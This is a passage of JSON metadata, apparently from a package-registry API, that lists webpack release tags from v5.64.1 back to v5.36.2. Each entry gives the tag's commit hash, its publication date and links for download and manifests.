5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/